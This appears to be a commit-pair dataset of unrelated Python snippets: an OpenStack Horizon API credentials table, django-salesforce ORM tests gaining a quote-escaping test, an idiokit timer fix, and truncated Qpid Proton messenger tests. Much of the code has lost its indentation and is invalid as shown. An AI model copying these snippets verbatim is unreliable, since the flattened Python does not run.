    policy_rules = (("compute", "os_compute_api:certificates:create"),)
    action_type = "danger"

    def allowed(self, request, datum=None):
        """Show the action only when EC2 is enabled, credentials already
        exist, and policy allows the user to delete and re-create them."""
        try:
            target = {"target.credential.user_id": request.user.id}
            if (api.base.is_service_enabled(request, 'ec2') and
                    forms.get_ec2_credentials(request) and
                    policy.check((("identity", "identity:ec2_create_credential"),
                                  ("identity", "identity:ec2_delete_credential")),
                                 request, target=target)):
                return True
        except Exception:
            # Best effort: any API or policy failure simply hides the button.
            pass
        return False
class EndpointsTable(tables.DataTable):
    """Read-only table listing the public endpoint of each API service."""
    # Service type, prettified for display (e.g. 'ec2' -> 'EC2').
    api_name = tables.Column('type',
                             verbose_name=_("Service"),
                             filters=(pretty_service_names,))
    # Publicly reachable URL for the service.
    api_endpoint = tables.Column('public_url',
                                 verbose_name=_("Service Endpoint"))
    class Meta(object):
        name = "endpoints"
        verbose_name = _("API Endpoints")
        multi_select = False
        table_actions = (DownloadCloudsYaml, DownloadOpenRCv2, DownloadOpenRC,
                         DownloadEC2,
                         ViewCredentials, RecreateCredentials)
|
delete empty file
|
# django-salesforce
#
# by Phil Christensen
# (c) 2012-2013 Freelancers Union (http://www.freelancersunion.org)
# See LICENSE.md for details
#
import datetime
import pytz
from django.conf import settings
from django.db import connections
from django.test import TestCase
import django
from salesforce.testrunner.example.models import (Account, Contact, Lead, User,
BusinessHours, ChargentOrder, CronTrigger,
GeneralCustomModel, test_custom_db_table, test_custom_db_column)
import logging
log = logging.getLogger(__name__)
DJANGO_14 = django.VERSION[:2] >= (1,4)  # timezone-aware datetimes need >= 1.4
# Salesforce username configured for the test database connection.
current_user = settings.DATABASES['salesforce']['USER']
# Email used to identify the shared test Lead created in setUp().
test_email = 'test-djsf-unittests-email@example.com'
# Names of all SObject tables visible through the salesforce connection.
sf_tables = [x['name'] for x in
        connections['salesforce'].introspection.table_list_cache['sobjects']
        ]
def refresh(obj):
    """Fetch a fresh copy of *obj* from the database by primary key."""
    model = type(obj)
    return model.objects.get(pk=obj.pk)
def round_datetime_utc(timestamp):
    """Truncate *timestamp* to whole seconds and attach the UTC zone.

    Salesforce datetimes are UTC with second precision, reported with a
    fixed +0000 offset rather than a named timezone.
    """
    result = timestamp.replace(microsecond=0)
    # Timezone-aware datetimes are only supported from Django 1.4 on.
    if DJANGO_14:
        result = result.replace(tzinfo=pytz.utc)
    return result
class BasicSOQLTest(TestCase):
def setUp(self):
"""
Create our test lead record.
"""
self.test_lead = Lead(
FirstName = "User",
LastName = "Unittest General",
Email = test_email,
Status = 'Open',
Company = "Some company, Ltd.",
)
self.test_lead.save()
def tearDown(self):
"""
Clean up our test lead record.
"""
self.test_lead.delete()
def test_raw(self):
"""
Get the first two contact records.
"""
contacts = Contact.objects.raw(
"SELECT Id, LastName, FirstName FROM Contact "
"LIMIT 2")
self.assertEqual(len(contacts), 2)
'%s' % contacts[0].__dict__ # Check that all fields are accessible
def test_raw_foreignkey_id(self):
"""
Get the first two contacts by raw query with a ForeignKey id field.
"""
contacts = Contact.objects.raw(
"SELECT Id, LastName, FirstName, OwnerId FROM Contact "
"LIMIT 2")
self.assertEqual(len(contacts), 2)
'%s' % contacts[0].__dict__ # Check that all fields are accessible
self.assertIn('@', contacts[0].Owner.Email)
def test_select_all(self):
"""
Get the first two contact records.
"""
contacts = Contact.objects.all()[0:2]
self.assertEqual(len(contacts), 2)
def test_exclude_query_construction(self):
"""
Test that exclude query construction returns valid SOQL.
"""
contacts = Contact.objects.filter(FirstName__isnull=False).exclude(Email="steve@apple.com", LastName="Wozniak").exclude(LastName="smith")
number_of_contacts = contacts.count()
self.assertIsInstance(number_of_contacts, int)
def test_foreign_key(self):
"""
Verify that the owner of an Contact is the currently logged admin.
"""
contact = Contact.objects.all()[0]
user = contact.Owner
# This user can be e.g. 'admins@freelancersunion.org.prod001'.
self.assertEqual(user.Username, current_user)
def test_update_date(self):
"""
Test updating a date.
"""
now = round_datetime_utc(datetime.datetime.utcnow())
contact = Contact.objects.all()[0]
old_date = contact.EmailBouncedDate
contact.EmailBouncedDate = now.replace(tzinfo=pytz.utc)
contact.save()
try:
self.assertEqual(refresh(contact).EmailBouncedDate, now)
finally:
contact.EmailBouncedDate = old_date
contact.save()
self.assertEqual(refresh(contact).EmailBouncedDate, old_date)
def test_insert_date(self):
"""
Test inserting a date.
"""
now = round_datetime_utc(datetime.datetime.utcnow())
contact = Contact(
FirstName = 'Joe',
LastName = 'Freelancer',
EmailBouncedDate=now.replace(tzinfo=pytz.utc))
contact.save()
try:
self.assertEqual(refresh(contact).EmailBouncedDate, now)
finally:
contact.delete()
def test_default_specified_by_sf(self):
"""
Verify that an object with a field with default value specified by some
Salesforce code can be inserted. (The default is used only for a field
unspecified in SF REST API, but not for None or any similar value.
It was a pain for some unimportant foreign keys that don't accept null.
"""
# Verify a smart default is used.
contact = Contact(FirstName = 'sf_test', LastName='my')
contact.save()
try:
self.assertEqual(refresh(contact).Owner.Username, current_user)
finally:
contact.delete()
# Verify that an explicit value is possible for this field.
other_user_obj = User.objects.exclude(Username=current_user)[0]
contact = Contact(FirstName = 'sf_test', LastName='your',
Owner=other_user_obj)
contact.save()
try:
self.assertEqual(
refresh(contact).Owner.Username, other_user_obj.Username)
finally:
contact.delete()
def test_get(self):
"""
Get the test lead record.
"""
lead = Lead.objects.get(Email=test_email)
self.assertEqual(lead.FirstName, 'User')
self.assertEqual(lead.LastName, 'Unittest General')
# test a read only field (formula of full name)
self.assertEqual(lead.Name, 'User Unittest General')
def test_not_null(self):
"""
Get the test lead record by isnull condition.
"""
# TODO similar failed: Contact.objects.filter(Account__isnull=True)
# passed: Contact.objects.filter(Account=None)
lead = Lead.objects.get(Email__isnull=False, FirstName='User')
self.assertEqual(lead.FirstName, 'User')
self.assertEqual(lead.LastName, 'Unittest General')
def test_unicode(self):
"""
Make sure weird unicode breaks properly.
"""
test_lead = Lead(FirstName=u'\u2603', LastName="Unittest Unicode",
Email='test-djsf-unicode-email@example.com',
Company="Some company")
test_lead.save()
try:
self.assertEqual(refresh(test_lead).FirstName, u'\u2603')
finally:
test_lead.delete()
def test_date_comparison(self):
"""
Test that date comparisons work properly.
"""
today = round_datetime_utc(datetime.datetime(2013, 8, 27))
yesterday = today - datetime.timedelta(days=1)
tomorrow = today + datetime.timedelta(days=1)
contact = Contact(FirstName='sf_test', LastName='date',
EmailBouncedDate=today)
contact.save()
try:
contacts1 = Contact.objects.filter(EmailBouncedDate__gt=yesterday)
self.assertEqual(len(contacts1), 1)
contacts2 = Contact.objects.filter(EmailBouncedDate__gt=tomorrow)
self.assertEqual(len(contacts2), 0)
finally:
contact.delete()
def test_insert(self):
"""
Create a lead record, and make sure it ends up with a valid Salesforce ID.
"""
test_lead = Lead(FirstName="User", LastName="Unittest Inserts",
Email='test-djsf-inserts-email@example.com',
Company="Some company")
test_lead.save()
try:
self.assertEqual(len(test_lead.pk), 18)
finally:
test_lead.delete()
def test_delete(self):
"""
Create a lead record, then delete it, and make sure it's gone.
"""
test_lead = Lead(FirstName="User", LastName="Unittest Deletes",
Email='test-djsf-delete-email@example.com',
Company="Some company")
test_lead.save()
test_lead.delete()
self.assertRaises(Lead.DoesNotExist, Lead.objects.get, Email='test-djsf-delete-email@example.com')
def test_update(self):
"""
Update the test lead record.
"""
test_lead = Lead.objects.get(Email=test_email)
self.assertEquals(test_lead.FirstName, 'User')
test_lead.FirstName = 'Tested'
test_lead.save()
self.assertEqual(refresh(test_lead).FirstName, 'Tested')
def test_custom_objects(self):
"""
Make sure custom objects work.
"""
if not 'ChargentOrders__ChargentOrder__c' in sf_tables:
self.skipTest('Not found custom tables ChargentOrders__*')
orders = ChargentOrder.objects.all()[0:5]
self.assertEqual(len(orders), 5)
def test_custom_object_general(self):
"""
Create, read and delete any general custom object.
Object name and field name are user configurable by TEST_CUSTOM_FIELD.
"""
table_list_cache = connections['salesforce'].introspection.table_list_cache
table_names = [x['name'] for x in table_list_cache['sobjects']]
if not test_custom_db_table in sf_tables:
self.skipTest("Not found the expected custom object '%s'" %
test_custom_db_table)
obj = GeneralCustomModel(GeneralCustomField='sf_test')
obj.save()
try:
results = GeneralCustomModel.objects.all()[0:1]
self.assertEqual(len(results), 1)
self.assertEqual(results[0].GeneralCustomField, 'sf_test')
finally:
obj.delete()
def test_datetime_miliseconds(self):
"""
Verify that a field with milisecond resolution is readable.
"""
trigger = CronTrigger.objects.all()[0]
self.assertTrue(isinstance(trigger.PreviousFireTime, datetime.datetime))
# The reliability of this is only 99.9%, therefore it is commented out.
#self.assertNotEqual(trigger.PreviousFireTime.microsecond, 0)
def test_time_field(self):
"""
Test a TimeField (read, modify, verify).
"""
obj_orig = BusinessHours.objects.all()[0]
obj = refresh(obj_orig)
self.assertTrue(isinstance(obj.MondayStartTime, datetime.time))
obj.MondayStartTime = datetime.time(23, 59)
obj.save()
obj = refresh(obj)
try:
self.assertEqual(obj.MondayStartTime, datetime.time(23, 59))
finally:
obj_orig.save()
def test_account_insert_delete(self):
"""
Test insert and delete an account (normal or personal SF config)
"""
if settings.PERSON_ACCOUNT_ACTIVATED:
test_account = Account(FirstName='IntegrationTest',
LastName='Account')
else:
test_account = Account(Name='IntegrationTest Account')
test_account.save()
try:
accounts = Account.objects.filter(Name='IntegrationTest Account')
self.assertEqual(len(accounts), 1)
finally:
test_account.delete()
def test_similarity_filter_operators(self):
"""
Test filter operators that use LIKE 'something%' and similar.
"""
User.objects.get(Username__exact=current_user)
User.objects.get(Username__iexact=current_user.upper())
User.objects.get(Username__contains=current_user[1:-1])
User.objects.get(Username__icontains=current_user[1:-1].upper())
User.objects.get(Username__startswith=current_user[:-1])
User.objects.get(Username__istartswith=current_user[:-1].upper())
User.objects.get(Username__endswith=current_user[1:])
User.objects.get(Username__iendswith=current_user[1:].upper())
# Operators regex and iregex not tested because they are not supported.
def test_unsupported_bulk_create(self):
"""
Unsupported bulk_create: "Errors should never pass silently."
"""
if not DJANGO_14:
self.skipTest('Django 1.3 has no bulk operations.')
objects = [Contact(LastName='sf_test a'), Contact(LastName='sf_test b')]
self.assertRaises(AssertionError, Contact.objects.bulk_create, objects)
Add test for escaping single quotes.
# django-salesforce
#
# by Phil Christensen
# (c) 2012-2013 Freelancers Union (http://www.freelancersunion.org)
# See LICENSE.md for details
#
import datetime
import pytz
from django.conf import settings
from django.db import connections
from django.test import TestCase
import django
from salesforce.testrunner.example.models import (Account, Contact, Lead, User,
BusinessHours, ChargentOrder, CronTrigger,
GeneralCustomModel, test_custom_db_table, test_custom_db_column)
import logging
log = logging.getLogger(__name__)
DJANGO_14 = django.VERSION[:2] >= (1,4)  # timezone-aware datetimes need >= 1.4
# Salesforce username configured for the test database connection.
current_user = settings.DATABASES['salesforce']['USER']
# Email used to identify the shared test Lead created in setUp().
test_email = 'test-djsf-unittests-email@example.com'
# Names of all SObject tables visible through the salesforce connection.
sf_tables = [x['name'] for x in
        connections['salesforce'].introspection.table_list_cache['sobjects']
        ]
def refresh(obj):
    """Fetch a fresh copy of *obj* from the database by primary key."""
    model = type(obj)
    return model.objects.get(pk=obj.pk)
def round_datetime_utc(timestamp):
    """Truncate *timestamp* to whole seconds and attach the UTC zone.

    Salesforce datetimes are UTC with second precision, reported with a
    fixed +0000 offset rather than a named timezone.
    """
    result = timestamp.replace(microsecond=0)
    # Timezone-aware datetimes are only supported from Django 1.4 on.
    if DJANGO_14:
        result = result.replace(tzinfo=pytz.utc)
    return result
class BasicSOQLTest(TestCase):
def setUp(self):
"""
Create our test lead record.
"""
self.test_lead = Lead(
FirstName = "User",
LastName = "Unittest General",
Email = test_email,
Status = 'Open',
Company = "Some company, Ltd.",
)
self.test_lead.save()
def tearDown(self):
"""
Clean up our test lead record.
"""
self.test_lead.delete()
def test_raw(self):
"""
Get the first two contact records.
"""
contacts = Contact.objects.raw(
"SELECT Id, LastName, FirstName FROM Contact "
"LIMIT 2")
self.assertEqual(len(contacts), 2)
'%s' % contacts[0].__dict__ # Check that all fields are accessible
def test_raw_foreignkey_id(self):
"""
Get the first two contacts by raw query with a ForeignKey id field.
"""
contacts = Contact.objects.raw(
"SELECT Id, LastName, FirstName, OwnerId FROM Contact "
"LIMIT 2")
self.assertEqual(len(contacts), 2)
'%s' % contacts[0].__dict__ # Check that all fields are accessible
self.assertIn('@', contacts[0].Owner.Email)
def test_select_all(self):
"""
Get the first two contact records.
"""
contacts = Contact.objects.all()[0:2]
self.assertEqual(len(contacts), 2)
def test_exclude_query_construction(self):
"""
Test that exclude query construction returns valid SOQL.
"""
contacts = Contact.objects.filter(FirstName__isnull=False).exclude(Email="steve@apple.com", LastName="Wozniak").exclude(LastName="smith")
number_of_contacts = contacts.count()
self.assertIsInstance(number_of_contacts, int)
def test_foreign_key(self):
"""
Verify that the owner of an Contact is the currently logged admin.
"""
contact = Contact.objects.all()[0]
user = contact.Owner
# This user can be e.g. 'admins@freelancersunion.org.prod001'.
self.assertEqual(user.Username, current_user)
def test_update_date(self):
"""
Test updating a date.
"""
now = round_datetime_utc(datetime.datetime.utcnow())
contact = Contact.objects.all()[0]
old_date = contact.EmailBouncedDate
contact.EmailBouncedDate = now.replace(tzinfo=pytz.utc)
contact.save()
try:
self.assertEqual(refresh(contact).EmailBouncedDate, now)
finally:
contact.EmailBouncedDate = old_date
contact.save()
self.assertEqual(refresh(contact).EmailBouncedDate, old_date)
def test_insert_date(self):
"""
Test inserting a date.
"""
now = round_datetime_utc(datetime.datetime.utcnow())
contact = Contact(
FirstName = 'Joe',
LastName = 'Freelancer',
EmailBouncedDate=now.replace(tzinfo=pytz.utc))
contact.save()
try:
self.assertEqual(refresh(contact).EmailBouncedDate, now)
finally:
contact.delete()
def test_default_specified_by_sf(self):
"""
Verify that an object with a field with default value specified by some
Salesforce code can be inserted. (The default is used only for a field
unspecified in SF REST API, but not for None or any similar value.
It was a pain for some unimportant foreign keys that don't accept null.
"""
# Verify a smart default is used.
contact = Contact(FirstName = 'sf_test', LastName='my')
contact.save()
try:
self.assertEqual(refresh(contact).Owner.Username, current_user)
finally:
contact.delete()
# Verify that an explicit value is possible for this field.
other_user_obj = User.objects.exclude(Username=current_user)[0]
contact = Contact(FirstName = 'sf_test', LastName='your',
Owner=other_user_obj)
contact.save()
try:
self.assertEqual(
refresh(contact).Owner.Username, other_user_obj.Username)
finally:
contact.delete()
def test_get(self):
"""
Get the test lead record.
"""
lead = Lead.objects.get(Email=test_email)
self.assertEqual(lead.FirstName, 'User')
self.assertEqual(lead.LastName, 'Unittest General')
# test a read only field (formula of full name)
self.assertEqual(lead.Name, 'User Unittest General')
def test_not_null(self):
"""
Get the test lead record by isnull condition.
"""
# TODO similar failed: Contact.objects.filter(Account__isnull=True)
# passed: Contact.objects.filter(Account=None)
lead = Lead.objects.get(Email__isnull=False, FirstName='User')
self.assertEqual(lead.FirstName, 'User')
self.assertEqual(lead.LastName, 'Unittest General')
def test_unicode(self):
"""
Make sure weird unicode breaks properly.
"""
test_lead = Lead(FirstName=u'\u2603', LastName="Unittest Unicode",
Email='test-djsf-unicode-email@example.com',
Company="Some company")
test_lead.save()
try:
self.assertEqual(refresh(test_lead).FirstName, u'\u2603')
finally:
test_lead.delete()
def test_date_comparison(self):
"""
Test that date comparisons work properly.
"""
today = round_datetime_utc(datetime.datetime(2013, 8, 27))
yesterday = today - datetime.timedelta(days=1)
tomorrow = today + datetime.timedelta(days=1)
contact = Contact(FirstName='sf_test', LastName='date',
EmailBouncedDate=today)
contact.save()
try:
contacts1 = Contact.objects.filter(EmailBouncedDate__gt=yesterday)
self.assertEqual(len(contacts1), 1)
contacts2 = Contact.objects.filter(EmailBouncedDate__gt=tomorrow)
self.assertEqual(len(contacts2), 0)
finally:
contact.delete()
def test_insert(self):
"""
Create a lead record, and make sure it ends up with a valid Salesforce ID.
"""
test_lead = Lead(FirstName="User", LastName="Unittest Inserts",
Email='test-djsf-inserts-email@example.com',
Company="Some company")
test_lead.save()
try:
self.assertEqual(len(test_lead.pk), 18)
finally:
test_lead.delete()
def test_delete(self):
"""
Create a lead record, then delete it, and make sure it's gone.
"""
test_lead = Lead(FirstName="User", LastName="Unittest Deletes",
Email='test-djsf-delete-email@example.com',
Company="Some company")
test_lead.save()
test_lead.delete()
self.assertRaises(Lead.DoesNotExist, Lead.objects.get, Email='test-djsf-delete-email@example.com')
def test_update(self):
"""
Update the test lead record.
"""
test_lead = Lead.objects.get(Email=test_email)
self.assertEquals(test_lead.FirstName, 'User')
test_lead.FirstName = 'Tested'
test_lead.save()
self.assertEqual(refresh(test_lead).FirstName, 'Tested')
def test_custom_objects(self):
"""
Make sure custom objects work.
"""
if not 'ChargentOrders__ChargentOrder__c' in sf_tables:
self.skipTest('Not found custom tables ChargentOrders__*')
orders = ChargentOrder.objects.all()[0:5]
self.assertEqual(len(orders), 5)
def test_custom_object_general(self):
"""
Create, read and delete any general custom object.
Object name and field name are user configurable by TEST_CUSTOM_FIELD.
"""
table_list_cache = connections['salesforce'].introspection.table_list_cache
table_names = [x['name'] for x in table_list_cache['sobjects']]
if not test_custom_db_table in sf_tables:
self.skipTest("Not found the expected custom object '%s'" %
test_custom_db_table)
obj = GeneralCustomModel(GeneralCustomField='sf_test')
obj.save()
try:
results = GeneralCustomModel.objects.all()[0:1]
self.assertEqual(len(results), 1)
self.assertEqual(results[0].GeneralCustomField, 'sf_test')
finally:
obj.delete()
def test_datetime_miliseconds(self):
"""
Verify that a field with milisecond resolution is readable.
"""
trigger = CronTrigger.objects.all()[0]
self.assertTrue(isinstance(trigger.PreviousFireTime, datetime.datetime))
# The reliability of this is only 99.9%, therefore it is commented out.
#self.assertNotEqual(trigger.PreviousFireTime.microsecond, 0)
def test_time_field(self):
"""
Test a TimeField (read, modify, verify).
"""
obj_orig = BusinessHours.objects.all()[0]
obj = refresh(obj_orig)
self.assertTrue(isinstance(obj.MondayStartTime, datetime.time))
obj.MondayStartTime = datetime.time(23, 59)
obj.save()
obj = refresh(obj)
try:
self.assertEqual(obj.MondayStartTime, datetime.time(23, 59))
finally:
obj_orig.save()
def test_account_insert_delete(self):
"""
Test insert and delete an account (normal or personal SF config)
"""
if settings.PERSON_ACCOUNT_ACTIVATED:
test_account = Account(FirstName='IntegrationTest',
LastName='Account')
else:
test_account = Account(Name='IntegrationTest Account')
test_account.save()
try:
accounts = Account.objects.filter(Name='IntegrationTest Account')
self.assertEqual(len(accounts), 1)
finally:
test_account.delete()
def test_similarity_filter_operators(self):
"""
Test filter operators that use LIKE 'something%' and similar.
"""
User.objects.get(Username__exact=current_user)
User.objects.get(Username__iexact=current_user.upper())
User.objects.get(Username__contains=current_user[1:-1])
User.objects.get(Username__icontains=current_user[1:-1].upper())
User.objects.get(Username__startswith=current_user[:-1])
User.objects.get(Username__istartswith=current_user[:-1].upper())
User.objects.get(Username__endswith=current_user[1:])
User.objects.get(Username__iendswith=current_user[1:].upper())
# Operators regex and iregex not tested because they are not supported.
def test_unsupported_bulk_create(self):
"""
Unsupported bulk_create: "Errors should never pass silently."
"""
if not DJANGO_14:
self.skipTest('Django 1.3 has no bulk operations.')
objects = [Contact(LastName='sf_test a'), Contact(LastName='sf_test b')]
self.assertRaises(AssertionError, Contact.objects.bulk_create, objects)
    def test_escape_single_quote(self):
        """
        Test that single quotes in strings used in filtering a QuerySet
        are escaped properly.
        """
        # The name deliberately mixes an apostrophe, double quotes and a
        # comma to exercise SOQL string escaping.
        account_name = '''Dr. Evil's Giant "Laser", LLC'''
        account = Account(Name=account_name)
        account.save()
        try:
            self.assertTrue(Account.objects.filter(Name=account_name).exists())
        finally:
            account.delete()
|
from __future__ import absolute_import
from functools import partial
from . import idiokit
from ._selectloop import cancel as selectloop_cancel, sleep as selectloop_sleep
def _cancel(node, _):
    # Listener callback: cancel the pending select-loop timer node once the
    # associated result resolves (the resolved value itself is ignored).
    selectloop_cancel(node)
def sleep(delay):
    """Return an idiokit.Event that succeeds after *delay* seconds.

    If the event's result resolves earlier, the underlying select-loop
    timer is cancelled via the _cancel listener.
    """
    event = idiokit.Event()
    node = selectloop_sleep(delay, event.succeed)
    event.result().unsafe_listen(partial(_cancel, node))
    return event
class Timeout(Exception):
    """Default exception thrown into a stream when timeout() expires."""
    pass
def timeout(timeout, stream=None, throw=None):
    """Throw *throw* (default: a fresh Timeout()) into *stream* after
    *timeout* seconds.

    If *stream* is None a new idiokit.Event is created and returned. The
    pending timer is cancelled if the stream's result resolves first.
    """
    # BUG FIX: the default used to be a single Timeout() instance created
    # once at import time and shared by every call; exception instances
    # accumulate state (e.g. tracebacks), so each call must get its own.
    # (Explicitly passing None now also yields a fresh Timeout.)
    if throw is None:
        throw = Timeout()
    if stream is None:
        stream = idiokit.Event()
    node = selectloop_sleep(timeout, stream.throw, throw)
    stream.result().unsafe_listen(partial(_cancel, node))
    return stream
idiokit.timer: Fix, use threadsafe Value.listen calls.
--HG--
branch : new-selectloop
from __future__ import absolute_import
from functools import partial
from . import idiokit
from ._selectloop import cancel as selectloop_cancel, sleep as selectloop_sleep
def _cancel(node, _):
    # Listener callback: cancel the pending select-loop timer node once the
    # associated result resolves (the resolved value itself is ignored).
    selectloop_cancel(node)
def sleep(delay):
    """Return an idiokit.Event that succeeds after *delay* seconds.

    If the event's result resolves earlier, the underlying select-loop
    timer is cancelled via the _cancel listener.
    """
    event = idiokit.Event()
    node = selectloop_sleep(delay, event.succeed)
    event.result().listen(partial(_cancel, node))
    return event
class Timeout(Exception):
    """Default exception thrown into a stream when timeout() expires."""
    pass
def timeout(timeout, stream=None, throw=None):
    """Throw *throw* (default: a fresh Timeout()) into *stream* after
    *timeout* seconds.

    If *stream* is None a new idiokit.Event is created and returned. The
    pending timer is cancelled if the stream's result resolves first.
    """
    # BUG FIX: the default used to be a single Timeout() instance created
    # once at import time and shared by every call; exception instances
    # accumulate state (e.g. tracebacks), so each call must get its own.
    # (Explicitly passing None now also yields a fresh Timeout.)
    if throw is None:
        throw = Timeout()
    if stream is None:
        stream = idiokit.Event()
    node = selectloop_sleep(timeout, stream.throw, throw)
    stream.result().listen(partial(_cancel, node))
    return stream
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import os
import sys
from common import Test, Skipped, free_tcp_ports, \
MessengerReceiverC, MessengerSenderC, \
MessengerReceiverValgrind, MessengerSenderValgrind, \
MessengerReceiverPython, MessengerSenderPython, \
isSSLPresent
from proton import *
#
# Tests that run the apps
#
class AppTests(Test):
    """Base class for tests that launch external sender/receiver apps.

    Tracks the started processes and provides configuration defaults that
    shrink automatically when running under valgrind.
    """
    def __init__(self, *args):
        Test.__init__(self, *args)
        # Toggled by valgrind_test(); selects the smaller "valgrind" defaults.
        self.is_valgrind = False
    def default(self, name, value, **kwargs):
        """Resolve a configuration default, preferring the 'valgrind'
        override when running under valgrind; delegates to Test.default."""
        if self.is_valgrind:
            default = kwargs.get("valgrind", value)
        else:
            default = value
        return Test.default(self, name, default, **kwargs)
    @property
    def iterations(self):
        # How many times each sender is re-run.
        return int(self.default("iterations", 2, fast=1, valgrind=1))
    @property
    def send_count(self):
        # Messages sent per target.
        return int(self.default("send_count", 17, fast=1, valgrind=1))
    @property
    def target_count(self):
        # Number of targets to send to.
        return int(self.default("target_count", 5, fast=1, valgrind=1))
    @property
    def send_batch(self):
        # Messages sent before waiting for replies.
        return int(self.default("send_batch", 7, fast=1, valgrind=1))
    @property
    def forward_count(self):
        # Number of forwarding targets (relay tests).
        return int(self.default("forward_count", 5, fast=1, valgrind=1))
    @property
    def port_count(self):
        # Ports the receiver listens on (star-topology tests).
        return int(self.default("port_count", 3, fast=1, valgrind=1))
    @property
    def sender_count(self):
        # Number of concurrent senders (star-topology tests).
        return int(self.default("sender_count", 3, fast=1, valgrind=1))
    def valgrind_test(self):
        # Mark this run as a valgrind run (smaller workloads).
        self.is_valgrind = True
    def setup(self):
        self.senders = []
        self.receivers = []
    def teardown(self):
        pass
    def _do_test(self, iterations=1):
        """Start all receivers, run each sender *iterations* times, then
        wait for everything and assert every process exited with status 0."""
        verbose = self.verbose
        for R in self.receivers:
            R.start( verbose )
        for j in range(iterations):
            for S in self.senders:
                S.start( verbose )
            for S in self.senders:
                S.wait()
                #print("SENDER OUTPUT:")
                #print( S.stdout() )
                assert S.status() == 0, ("Command '%s' failed status=%d: '%s' '%s'"
                                         % (str(S.cmdline()),
                                            S.status(),
                                            S.stdout(),
                                            S.stderr()))
        for R in self.receivers:
            R.wait()
            #print("RECEIVER OUTPUT")
            #print( R.stdout() )
            assert R.status() == 0, ("Command '%s' failed status=%d: '%s' '%s'"
                                     % (str(R.cmdline()),
                                        R.status(),
                                        R.stdout(),
                                        R.stderr()))
#
# Traffic passing tests based on the Messenger apps
#
class MessengerTests(AppTests):
_timeout = 60
    def _ssl_check(self):
        # Skip SSL-based tests when proton was built without SSL support.
        if not isSSLPresent():
            raise Skipped("No SSL libraries found.")
def __init__(self, *args):
AppTests.__init__(self, *args)
    def _do_oneway_test(self, receiver, sender, domain="amqp"):
        """ Send N messages to a receiver.
        Parameters:
        iterations - repeat the senders this many times
        target_count = # of targets to send to.
        send_count = # messages sent to each target
        """
        iterations = self.iterations
        send_count = self.send_count
        target_count = self.target_count
        send_total = send_count * target_count
        # Receiver must see every message from every sender iteration.
        receive_total = send_total * iterations
        port = free_tcp_ports()[0]
        # NOTE(review): '~' appears to mark a bind/listen address in
        # Messenger subscription syntax — confirm against Messenger docs.
        receiver.subscriptions = ["%s://~0.0.0.0:%s" % (domain, port)]
        receiver.receive_count = receive_total
        receiver.timeout = MessengerTests._timeout
        self.receivers.append( receiver )
        # One distinct target path (X0, X1, ...) per target, same port.
        sender.targets = ["%s://0.0.0.0:%s/X%d" % (domain, port, j) for j in range(target_count)]
        sender.send_count = send_total
        sender.timeout = MessengerTests._timeout
        self.senders.append( sender )
        self._do_test(iterations)
def _do_echo_test(self, receiver, sender, domain="amqp"):
""" Send N messages to a receiver, which responds to each.
Parameters:
iterations - repeat the senders this many times
target_count - # targets to send to
send_count = # messages sent to each target
send_batch - wait for replies after this many messages sent
"""
iterations = self.iterations
send_count = self.send_count
target_count = self.target_count
send_batch = self.send_batch
send_total = send_count * target_count
receive_total = send_total * iterations
port = free_tcp_ports()[0]
receiver.subscriptions = ["%s://~0.0.0.0:%s" % (domain, port)]
receiver.receive_count = receive_total
receiver.send_reply = True
receiver.timeout = MessengerTests._timeout
self.receivers.append( receiver )
sender.targets = ["%s://0.0.0.0:%s/%dY" % (domain, port, j) for j in range(target_count)]
sender.send_count = send_total
sender.get_reply = True
sender.send_batch = send_batch
sender.timeout = MessengerTests._timeout
self.senders.append( sender )
self._do_test(iterations)
def _do_relay_test(self, receiver, relay, sender, domain="amqp"):
""" Send N messages to a receiver, which replies to each and forwards
each of them to different receiver.
Parameters:
iterations - repeat the senders this many times
target_count - # targets to send to
send_count = # messages sent to each target
send_batch - wait for replies after this many messages sent
forward_count - forward to this many targets
"""
iterations = self.iterations
send_count = self.send_count
target_count = self.target_count
send_batch = self.send_batch
forward_count = self.forward_count
send_total = send_count * target_count
receive_total = send_total * iterations
port = free_tcp_ports()[0]
receiver.subscriptions = ["%s://~0.0.0.0:%s" % (domain, port)]
receiver.receive_count = receive_total
receiver.send_reply = True
# forward to 'relay' - uses two links
# ## THIS FAILS:
# receiver.forwards = ["amqp://Relay/%d" % j for j in range(forward_count)]
receiver.forwards = ["%s://Relay" % domain]
receiver.timeout = MessengerTests._timeout
self.receivers.append( receiver )
relay.subscriptions = ["%s://0.0.0.0:%s" % (domain, port)]
relay.name = "Relay"
relay.receive_count = receive_total
relay.timeout = MessengerTests._timeout
self.receivers.append( relay )
# send to 'receiver'
sender.targets = ["%s://0.0.0.0:%s/X%dY" % (domain, port, j) for j in range(target_count)]
sender.send_count = send_total
sender.get_reply = True
sender.timeout = MessengerTests._timeout
self.senders.append( sender )
self._do_test(iterations)
def _do_star_topology_test(self, r_factory, s_factory, domain="amqp"):
"""
A star-like topology, with a central receiver at the hub, and senders at
the spokes. Each sender will connect to each of the ports the receiver is
listening on. Each sender will then create N links per each connection.
Each sender will send X messages per link, waiting for a response.
Parameters:
iterations - repeat the senders this many times
port_count - # of ports the receiver will listen on. Each sender connects
to all ports.
sender_count - # of senders
target_count - # of targets per connection
send_count - # of messages sent to each target
send_batch - # of messages to send before waiting for response
"""
iterations = self.iterations
port_count = self.port_count
sender_count = self.sender_count
target_count = self.target_count
send_count = self.send_count
send_batch = self.send_batch
send_total = port_count * target_count * send_count
receive_total = send_total * sender_count * iterations
ports = free_tcp_ports(port_count)
receiver = r_factory()
receiver.subscriptions = ["%s://~0.0.0.0:%s" % (domain, port) for port in ports]
receiver.receive_count = receive_total
receiver.send_reply = True
receiver.timeout = MessengerTests._timeout
self.receivers.append( receiver )
for i in range(sender_count):
sender = s_factory()
sender.targets = ["%s://0.0.0.0:%s/%d" % (domain, port, j) for port in ports for j in range(target_count)]
sender.send_count = send_total
sender.send_batch = send_batch
sender.get_reply = True
sender.timeout = MessengerTests._timeout
self.senders.append( sender )
self._do_test(iterations)
def test_oneway_C(self):
self._do_oneway_test(MessengerReceiverC(), MessengerSenderC())
def test_oneway_C_SSL(self):
self._ssl_check()
